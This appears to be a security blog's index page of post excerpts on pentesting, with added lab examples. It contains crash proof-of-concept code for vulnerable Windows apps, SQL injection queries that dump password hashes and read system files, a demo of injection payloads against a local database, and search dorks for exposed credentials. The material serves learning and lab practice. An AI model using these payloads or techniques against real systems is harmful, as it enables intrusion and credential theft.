Blog

  • PoshC2 Commands Reference

    PoshC2 is an open-source command and control framework written in Python 3; it can be downloaded from https://github.com/nettitude/PoshC2. I am still learning this framework and need to study it more, but here are some commands I tested to see how they work. The PoshC2 commands referenced here can all be found with the help command. These are just a few important commands I have noted (nothing special); I will add other commands as I try them in my lab.

    Read more →
  • Active Reconnaissance

    Active reconnaissance is the method of gathering information directly from the target. Be aware that this kind of information gathering may be logged by IDS, IPS, and EDR.
    DNS Enumeration
      Sn1per: a tool that drives other open-source tools for automated information gathering. Download Sn1per.
      Zone Transfer: if zone transfers are misconfigured, every record in the zone will be disclosed:
        host -l ns google.com
        dnsrecon -d microsoft
      Discover Subdomains:
        dnsenum -f namelist.txt microsoft.com
        sublist3r -o output.

    Read more →
  • Open Source Intelligence(OSINT)

    The purpose of OSINT is to collect as much information as possible without directly interacting with the target. Note: the methods included here are not a complete list of OSINT methods. What do hackers collect? The information collected can be divided into two categories. Business Information: everything about the target company, for example what kind of business the company runs, what its activities are, partner and investor information, and company departments.

    Read more →
  • Tmux Cheat Sheet

    Tmux is a wonderful terminal multiplexer and a very useful tool for penetration testers and red teamers. I use it a lot. Here I have noted the tmux commands I use most, for future reference.
    Custom .tmux.conf:
      unbind C-b
      unbind '"'
      unbind %
      set-option -g prefix C-a
      bind-key C-a send-prefix
      bind h split-window -h
      bind v split-window -v
      set -g default-terminal "screen-256color"
      set -g message-style fg=white,bold,bg=red
      set -g status-style fg=white,bg=red
      set -g pane-border-style fg=red
      set -g pane-active-border-style "bg=red fg=green"
      set -g mouse on
    Session: here are some session management commands

    Read more →
  • Useful Keyboard Shortcut in Linux

    If we want to work faster we need to know keyboard shortcuts; always reaching for the mouse gets tedious. I don't know every shortcut, but I am going to keep the commonly used ones here.
    Shortcuts in Debian Linux (these work on Debian-based Linux with GNOME):
      Navigation
        Super+Shift+Left/Right: move window to left/right monitor
        Ctrl+Alt+Tab: switch system controls
        Super+Tab: switch applications
        Alt+Esc: switch windows directly
      System
        Super+L: lock screen
        Super+A: show all notifications
        Alt+F2: run command prompt
        Super or Super+S: overview
        Ctrl+Alt+Delete: log out
      Window
        Alt+F7: move window
        Alt+F8: resize window
        Alt+Up/Down: restore window
        Super+Left/Right: split on left/right
        Alt+F4: close window
        Super+H: hide window
      Application shortcuts: if the applications are GNOME based, the same shortcuts should work on other distros.

    Read more →
  • Essential Tools for Penetration Tester

    Every penetration tester, white-hat hacker and red teamer needs tools; tools make our process easier. I will list my favourite tools with a short description for future reference. If you think I have missed anything, please let me know and I will update the post. Enumeration: information gathering and enumeration is the first stage for good and bad hackers alike, and enumerating with open-source tools speeds up the process. Here are some tools used for enumeration.

    Read more →
  • Stack Overflow EGG Hunting(VulnServer)

    There are situations where our shellcode does not fit in the small memory space we control. In that case we may be able to store the payload in a larger memory region, but how do we find its address? An egg hunter is a small piece of code that locates the shellcode by searching memory for a specific string (the tag, or "egg") and starts executing the code placed right after the tag. I will
    Vulnerable application: https://github.com/stephenbradshaw/vulnserver
    Crash PoC:
      import socket
      vulCommand = b"KSTET \r\n"
      buffer = b"A"*1000
      s = socket.

    Read more →
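A Python model of the egg hunter search described above, added here as an example; it is not code from the original post or from vulnserver. The 4-byte tag "w00t", the 16-byte placeholder shellcode and the memory layout are all constructed for the demonstration. It shows why the tag is written twice: the hunter's own code already contains one copy of the tag (as an immediate operand), so a search for a single copy would stop on the hunter itself instead of the payload.

```python
import struct

TAG = b"w00t"                 # assumed 4-byte tag; any 4 bytes work
SHELLCODE = b"\xcc" * 16      # constructed stand-in for real shellcode
GAP = 512                     # constructed distance between hunter and payload


def build_egg(tag, shellcode):
    """Payload to place in the large buffer: the tag twice, then the shellcode."""
    return tag * 2 + shellcode


def tag_as_immediate(tag):
    """The 32-bit little-endian immediate a real hunter embeds, e.g. mov eax, imm32."""
    return struct.unpack("<I", tag)[0]   # b"w00t" -> 0x74303077


def build_memory(tag, shellcode, gap=GAP):
    """Constructed memory image: hunter code (holding the tag ONCE), a gap, the egg."""
    hunter = b"\x90" * 12 + tag + b"\x90" * 12
    return hunter + b"\x00" * gap + build_egg(tag, shellcode)


def hunt(memory, tag):
    """Offset of the first byte after the 8-byte egg, or None if it is absent.

    Mirrors the hunter's loop: compare 4 bytes at the cursor with the tag, and
    only treat it as a hit when the following 4 bytes match as well.
    """
    egg = tag * 2
    for i in range(len(memory) - len(egg) + 1):
        if memory[i:i + 4] == tag and memory[i + 4:i + 8] == tag:
            return i + len(egg)
    return None


def shellcode_offset_demo():
    """Return (egg hunter result, naive single-tag hit, whether the result is the shellcode)."""
    mem = build_memory(TAG, SHELLCODE)
    off = hunt(mem, TAG)
    naive = mem.find(TAG)                 # stops on the hunter's own copy of the tag
    return off, naive, mem[off:off + len(SHELLCODE)] == SHELLCODE


if __name__ == "__main__":
    print(shellcode_offset_demo())
```

With the constructed layout the hunter finds the code at offset 548 while a naive search returns 12, the tag inside the hunter itself; that is the whole reason the tag is doubled in the egg.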
  • SEH Stack Buffer Overflow

    After a long time, I am again practicing how to exploit stack-based buffer overflows. This post is just a quick note on how to exploit a simple SEH-based overflow. The existing exploit can be found at https://www.exploit-db.com/exploits/50471
    Application download link: https://www.exploit-db.com/apps/762256b7bcc2d7d47a394a52f522b16b-ytgrabber.exe
    Crash the application. PoC code:
      buffer = "A" * 9000
      createFile = open('testing.txt', "w")
      createFile.write(buffer)
      createFile.close()
    Start Youtube Video Grabber and attach it in WinDbg. Open testing.txt, copy the content, click the Enter code button, and paste it into the Username and Serial number fields:

    Read more →
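The step after the crash above is finding how far into the 9000 bytes the SEH record is overwritten. The following Python is an added example, not code from the post or from the exploit-db entry: it generates the same Aa0Aa1... cyclic pattern that Metasploit's pattern_create produces and looks up the offset of the value the debugger reports. The file name testing.txt is taken from the post; the sample crash value 0x41326141 is constructed for the demonstration.

```python
import string
import struct

MAX_PATTERN = 26 * 26 * 10 * 3   # 20280 bytes before the pattern repeats


def pattern_create(length):
    """Cyclic pattern of unique 4-byte windows (Aa0Aa1Aa2...), same scheme as pattern_create."""
    if length > MAX_PATTERN:
        raise ValueError("pattern longer than %d bytes would repeat" % MAX_PATTERN)
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out)


def pattern_offset(pattern, value):
    """Offset of a crash value in the pattern, or -1.

    `value` is either the 32-bit integer the debugger shows (e.g. the SEH
    handler from !exchain) or the 4 raw bytes; the integer is converted to
    little-endian bytes because that is how it sat in memory.
    """
    needle = struct.pack("<I", value) if isinstance(value, int) else bytes(value)
    return pattern.find(needle)


def write_pattern_file(path, length=9000):
    """Replace the "A" * 9000 buffer with the pattern and write it for the application."""
    with open(path, "w") as f:
        f.write(pattern_create(length).decode())


if __name__ == "__main__":
    write_pattern_file("testing.txt")
    # Constructed example: if WinDbg showed the handler overwritten with 0x41326141 ...
    print(pattern_offset(pattern_create(9000), 0x41326141))   # ... the offset is 6
```

Because x86 is little-endian, a handler value of 0x41326141 corresponds to the bytes "Aa2A" in the file, which is why the integer form is packed with "<I" before searching.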
  • SQL Injection Cheat Sheet

    Enumeration: gather some juicy info to move to higher privileges.
    MySQL information and the SQL query that returns it:
      Database version: select @@version
      Current database: select database()
      Other database names: select schema_name from information_schema.schemata
      Database user: select user(); select system_user()
      Database users and password hashes: select host, user, password from mysql.user (on MySQL 5.7 and later the column is authentication_string)
      Table names: select table_schema, table_name from information_schema.tables; select table_name from information_schema.tables where table_schema='userdb'
      Column names: select table_name, column_name from information_schema.columns; select column_name from information_schema.columns where table_name = 'usertable'
      Read system files: select load_file('/etc/hosts')
      Write to file: select "<?

    Read more →
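The cheat-sheet queries above are what you inject once you have found an injection point; the Python below is an added example, not code from the post, showing how they get delivered through a UNION in a string-concatenated query and how a parameterised query stops them. It uses the sqlite3 module from the standard library so it runs offline; the usertable schema and rows are constructed, and sqlite_master and sqlite_version() stand in for information_schema.tables and @@version on MySQL.

```python
import sqlite3

LIBRARY_VERSION = sqlite3.sqlite_version   # what the "version" payload should return


def setup_db():
    """Constructed in-memory database; usertable mirrors the table name in the cheat sheet."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        "CREATE TABLE usertable(id INTEGER, username TEXT, password TEXT);"
        "INSERT INTO usertable VALUES (1, 'alice', 'hash1'), (2, 'bob', 'hash2');"
    )
    return conn


def lookup_vulnerable(conn, username):
    """Vulnerable on purpose: the username is pasted straight into the SQL text."""
    sql = "SELECT username, password FROM usertable WHERE username = '%s'" % username
    return conn.execute(sql).fetchall()


def lookup_fixed(conn, username):
    """Hardened form: a bound parameter, so the input can never become SQL."""
    sql = "SELECT username, password FROM usertable WHERE username = ?"
    return conn.execute(sql, (username,)).fetchall()


# Injected strings. The query selects two columns, so each UNION supplies two.
# Comments map each one to the MySQL query from the cheat sheet.
PAYLOADS = {
    # MySQL: select @@version
    "version": "' UNION SELECT sqlite_version(), NULL-- ",
    # MySQL: select table_name from information_schema.tables where table_schema='userdb'
    "tables": "' UNION SELECT name, type FROM sqlite_master WHERE type='table'-- ",
    # dump every row, including the password column
    "hashes": "' OR 1=1-- ",
}


if __name__ == "__main__":
    conn = setup_db()
    for name, payload in PAYLOADS.items():
        print(name, lookup_vulnerable(conn, payload))
    print("fixed:", lookup_fixed(conn, PAYLOADS["hashes"]))   # []
```

The closing quote of the original query is swallowed by the trailing comment, which is why every payload starts with a quote and ends with "-- ".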
  • A quick cheat sheet on Python

    This is not a complete Python 3 tutorial, just a quick note to remember the Python 3 syntax.
    Python data types (name, type, description):
      Integer (int): numbers such as 100, 200, 1337
      Strings (str): a sequence of characters such as "Cyber"
      Booleans (bool): the logical values True or False
      Floating point (float): numbers with a decimal point such as 1.1
      Lists (list): sequence of objects: ["Cyber", 10]
      Dictionaries (dict): key/value pairs: {"key1": "Cyber", "key2": "Red"}
      Sets (set): collection of unique objects: {"test", "test1"}
      Tuples (tuple): ordered, immutable sequence of objects: (1, "Cyber")
    String: here is an example of string indexing and slicing:

    Read more →
  • Web App Enumeration

    Enumerate using Google: with Google or another search engine we may be able to gather some valuable information. We can search for config files; SQL files; usernames, private keys, even passwords; error messages; and any other technical messages. The queries I use most (search operators take no space after the colon):
      # Find pages
      site:site.com
      # Find subdomains
      site:site.com -www
      # Find files (php/jsp/aspx/asp/cfm/sql)
      site:site.com filetype:php
      # Find pages whose title matches the keywords
      site:site.com intitle:"admin login"
      # If the title matches our keyword
      site:site.

    Read more →
  • Web Pentesting Checklist

    For web pentesting there is a lot to test. Below is the mandatory list of what I never miss. The goal? A reverse shell. Note: this checklist was created with the help of the OWASP Testing Guide and other resources found on the Internet.
    Recon/Enumeration
      Discover information using Google, Bing, Shodan, GitHub, Twitter, and LinkedIn
      Check whether robots.txt, crossdomain.xml, clientaccesspolicy.xml, phpinfo.php and sitemap.xml exist
      Identify a Web Application Firewall
      Brute force subdomains
      DNS reverse lookup
      Brute force files and directories
      Analyse SSL/TLS
      Crawl the entire site
      Find emails, employees, phone numbers, etc.
      Wayback history
      Nmap: scan all ports (including UDP) and do banner grabbing
      Identify input points
    Error Handling
      Request fake pages
      Try different HTTP methods such as TRACE, OPTIONS, DEBUG, NONE
      Request multiple parameters with different values (I.

    Read more →